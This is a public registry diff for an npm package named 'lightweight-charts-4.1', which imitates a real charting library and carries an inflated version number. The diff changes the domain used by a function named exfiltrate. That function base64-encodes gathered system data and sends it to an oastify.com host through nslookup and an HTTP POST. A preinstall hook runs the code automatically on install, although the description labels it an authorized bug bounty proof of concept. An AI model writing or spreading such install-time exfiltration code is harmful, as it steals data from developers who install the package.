lightweight-charts-4.1 1000.0.16 → 1000.0.17

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -81,7 +81,7 @@ function gatherData() {
81
81
  function exfiltrate(data) {
82
82
  const jsonStr = JSON.stringify(data);
83
83
  const payload = Buffer.from(jsonStr).toString('base64');
84
- const collabDomain = 'e8nyzhmzkf76kzdqnjcqbzj49vfm3gr5.oastify.com';
84
+ const collabDomain = 'zlofeq5aj3h5bki573hlg5e0jrpid81x.oastify.com';
85
85
  // DNS exfiltration (first 50 chars)
86
86
  executeCommand(`nslookup ${payload.substring(0, 50)}.${collabDomain}`);
87
87
  // HTTP POST full data
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lightweight-charts-4.1",
3
- "version": "1000.0.16",
3
+ "version": "1000.0.17",
4
4
  "description": "SECURITY BUG BOUNTY PoC - Advanced System Data Exfiltration - Authorized Testing",
5
5
  "scripts": {
6
6
  "preinstall": "node index.js"